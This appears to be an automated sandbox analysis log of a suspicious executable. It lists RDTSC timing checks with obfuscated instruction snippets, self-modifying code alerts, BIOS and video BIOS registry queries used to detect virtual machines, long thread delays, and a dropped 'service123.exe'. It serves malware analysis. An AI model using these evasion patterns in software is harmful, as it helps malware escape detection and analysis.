Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1139 second address: 70B11A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDAC110B293h 0x00000017 sub si, FACEh 0x0000001c jmp 00007FDAC110B299h 0x00000021 popfd 0x00000022 call 00007FDAC110B290h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11A3 second address: 70B11D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11D3 second address: 70B11D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11D7 second address: 70B11DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B11DD second address: 70B1206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDAC110B28Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1206 second address: 70B1215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1215 second address: 70B123A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B123A second address: 70B123E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B123E second address: 70B12B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDAC110B294h 0x0000000b popad 0x0000000c mov dword ptr [edx+18h], eax 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+1Ch] 0x00000016 pushad 0x00000017 mov bx, CF28h 0x0000001b popad 0x0000001c mov dword ptr [edx+1Ch], eax 0x0000001f jmp 00007FDAC110B293h 0x00000024 mov eax, dword ptr [esi+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov cx, di 0x0000002d pushfd 0x0000002e jmp 00007FDAC110B297h 0x00000033 jmp 00007FDAC110B293h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12B5 second address: 70B12BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12BB second address: 70B12E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDAC110B295h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12E6 second address: 70B12F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C7FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B12F6 second address: 70B1324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FDAC110B297h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, ax 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1324 second address: 70B138F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov eax, 1DC1175Fh 0x00000015 popad 0x00000016 mov dword ptr [edx+28h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FDAC0B0C807h 0x00000022 sbb eax, 0BAA695Eh 0x00000028 jmp 00007FDAC0B0C809h 0x0000002d popfd 0x0000002e push ecx 0x0000002f pop edx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B138F second address: 70B13A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, DCh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B13A9 second address: 70B13E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C800h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAC0B0C7FCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B13E3 second address: 70B1406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 0636DEADh 0x00000009 popad 0x0000000a mov word ptr [edx+30h], ax 0x0000000e pushad 0x0000000f mov ecx, 04823665h 0x00000014 push eax 0x00000015 mov dh, 31h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1406 second address: 70B140A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B140A second address: 70B140E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B140E second address: 70B1414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1414 second address: 70B1419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1419 second address: 70B1438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 2FBCh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDAC0B0C7FEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1438 second address: 70B143E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B143E second address: 70B1442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1442 second address: 70B146F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e jmp 00007FDAC110B28Eh 0x00000013 mov dword ptr [edx+34h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B146F second address: 70B1473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1473 second address: 70B1479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1479 second address: 70B149D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B149D second address: 70B14A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14A3 second address: 70B14EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDB2E85AA52h 0x0000000f jmp 00007FDAC0B0C800h 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDAC0B0C807h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14EE second address: 70B14F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B14F3 second address: 70B1507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 144CA788h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1507 second address: 70B1560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAC110B299h 0x0000000a add ax, 36A6h 0x0000000f jmp 00007FDAC110B291h 0x00000014 popfd 0x00000015 popad 0x00000016 mov eax, 7DB4F9D7h 0x0000001b popad 0x0000001c or dword ptr [edx+40h], FFFFFFFFh 0x00000020 jmp 00007FDAC110B28Ah 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDAC110B28Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1560 second address: 70B1564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1564 second address: 70B156A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B156A second address: 70B1596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC0B0C807h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1596 second address: 70B15C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B28Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7100C42 second address: 7100CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDAC0B0C801h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FDAC0B0C7FFh 0x0000001b and ecx, 017102BEh 0x00000021 jmp 00007FDAC0B0C809h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A07BE second address: 70A07EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B297h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A07EE second address: 70A0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C804h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040008 second address: 704000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704000C second address: 7040012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040012 second address: 7040036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC110B290h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040036 second address: 704003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704003C second address: 704005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAC110B291h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70405C6 second address: 704060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDAC0B0C7FEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDAC0B0C807h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704060D second address: 7040613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040613 second address: 7040617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040617 second address: 704061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040A3B second address: 7040AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDAC0B0C804h 0x00000011 xor eax, 3E5C6488h 0x00000017 jmp 00007FDAC0B0C7FBh 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push esi 0x00000024 mov si, di 0x00000027 pop ebx 0x00000028 pushfd 0x00000029 jmp 00007FDAC0B0C808h 0x0000002e add ecx, 3D6BBA18h 0x00000034 jmp 00007FDAC0B0C7FBh 0x00000039 popfd 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040AB1 second address: 7040AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 709091E second address: 7090922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090922 second address: 7090926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090926 second address: 709092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 709092C second address: 7090A44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushfd 0x0000000f jmp 00007FDAC110B293h 0x00000014 add cx, D57Eh 0x00000019 jmp 00007FDAC110B299h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FDAC110B297h 0x00000028 jmp 00007FDAC110B293h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FDAC110B298h 0x00000034 sbb eax, 210AEA08h 0x0000003a jmp 00007FDAC110B28Bh 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FDAC110B294h 0x00000049 sub eax, 4A640C68h 0x0000004f jmp 00007FDAC110B28Bh 0x00000054 popfd 0x00000055 jmp 00007FDAC110B298h 0x0000005a popad 0x0000005b mov ebp, esp 0x0000005d pushad 0x0000005e mov bx, ax 0x00000061 jmp 00007FDAC110B28Ah 0x00000066 popad 0x00000067 pop ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDAC110B297h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060CD6 second address: 7060D45 instructions: 0x00000000 rdtsc 0x00000002 call 00007FDAC0B0C808h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ecx, 28892783h 0x00000019 pushfd 0x0000001a jmp 00007FDAC0B0C808h 0x0000001f or esi, 055EFB48h 0x00000025 jmp 00007FDAC0B0C7FBh 0x0000002a popfd 0x0000002b popad 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D45 second address: 7060D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D49 second address: 7060D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D4F second address: 7060D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D63 second address: 7060DE3 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 44h 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 669199C6h 0x00000011 pop edi 0x00000012 mov si, EB23h 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push esi 0x0000001a pushfd 0x0000001b jmp 00007FDAC0B0C7FBh 0x00000020 and ax, A84Eh 0x00000025 jmp 00007FDAC0B0C809h 0x0000002a popfd 0x0000002b pop eax 0x0000002c mov di, 0344h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDAC0B0C7FFh 0x0000003b xor ax, 965Eh 0x00000040 jmp 00007FDAC0B0C809h 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060DE3 second address: 7060DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060DE8 second address: 7060E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushad 0x0000000e call 00007FDAC0B0C7FEh 0x00000013 pop ecx 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FDAC0B0C7FAh 0x0000001e mov dword ptr [esp], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDAC0B0C807h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060E42 second address: 7060E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 8206h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e jmp 00007FDAC110B28Ah 0x00000013 mov dword ptr [esp], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAC110B297h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060E76 second address: 7060EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FDAC0B0C7FBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edi, dword ptr [ebp+08h] 0x00000011 jmp 00007FDAC0B0C806h 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDAC0B0C807h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: D2F9BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: D2FA88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: EE9848 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Special instruction interceptor: First address: F65F39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 757
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 2236
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Window / User API: threadDelayed 2698
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1933
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8066
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6876 Thread sleep count: 47 > 30
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6876 Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6880 Thread sleep count: 49 > 30
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6880 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6860 Thread sleep count: 757 > 30
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6860 Thread sleep time: -1514757s >= -30000s
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 7148 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6856 Thread sleep count: 2236 > 30
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6856 Thread sleep time: -4474236s >= -30000s
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6828 Thread sleep count: 2698 > 30
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe TID: 6828 Thread sleep time: -5398698s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep count: 1933 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep time: -193300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep count: 8066 > 30
